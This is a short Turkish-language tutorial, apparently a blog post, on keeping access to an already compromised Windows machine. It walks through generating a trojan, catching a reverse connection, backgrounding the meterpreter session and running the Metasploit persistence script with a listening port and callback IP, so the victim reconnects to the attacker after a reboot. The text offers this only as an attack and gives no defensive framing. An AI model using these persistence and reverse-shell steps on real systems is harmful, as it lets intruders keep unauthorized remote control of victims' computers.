Bu makalde ele geçirilmiş bir windows işletim sistemine nasıl backdoor (Arka Kapı) yerleştirilir bu konu ele alacağız.
İlk olarak aşağıda örnek bir trojan oluşturulmuştur, belirtilen port dinlemeye alınarak hedef sistemden reverse bağlantı alınmıştır.
Şimdi ise , meterpreter satırındayken “backround” komutunu kullanarak gelen bağlantıyı arka plana alıyoruz “sessions” komutu ile “ID” numarasını öğreniyoruz. Şimdi ise tekrardan “sessions -i ” şeklinde bağlantı yapılır. Meterpreter satırındayken persistence script’ini çalıştıracagız “run persistence -U i 5 -p <dinleme yapılan port> -r <bağlantıyı karşılayacak ip adresi>” şeklinde çalıştırılır.
Evet gerekli aşamalar sıkıntız bir şekilde gerçekleşti, şimdi test etmek için hedef sistemi shutdown veya restart edelim.
Evet sessions komutu çalıştırdıgımız zaman görüldüğü gibi hiçbir oturum yok. Hedef sistem açıldıktan sonra “run” komutunu kullanarak sisteme tekrardan giriş sağlıyoruz.
Umarım faydalı bir makale olmuştur, bir sonraki makalemizde görüşmek üzere.
